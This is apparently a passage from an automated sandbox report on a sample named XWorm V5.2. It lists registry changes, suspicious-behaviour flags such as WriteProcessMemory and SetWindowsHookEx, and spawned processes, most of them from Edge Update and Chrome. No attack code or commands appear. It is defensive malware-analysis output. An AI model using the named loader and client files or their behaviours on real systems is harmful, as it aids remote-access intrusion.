| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\runas\command | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.svg\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\ = "Microsoft Edge Update Update3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\PROGID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachine.1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ = "IApp2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\InprocServer32\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\ = "Microsoft Edge Update CredentialDialog" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftofficehub_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods\ = "24" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\PROGID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\Desktop\XClient.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.rar"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4228 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3252 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3256 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1748 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3612 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2548 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4376 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2460 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4032 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4964 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5196 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 --field-trial-handle=1908,i,12558841684096790522,15945605156559952924,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\21863f3a269e42f792ed512f378898ac /t 4868 /p 5240
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd0dbab58,0x7ffdd0dbab68,0x7ffdd0dbab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1928,i,1270745556568762922,15986385579364911795,131072 /prefetch:8
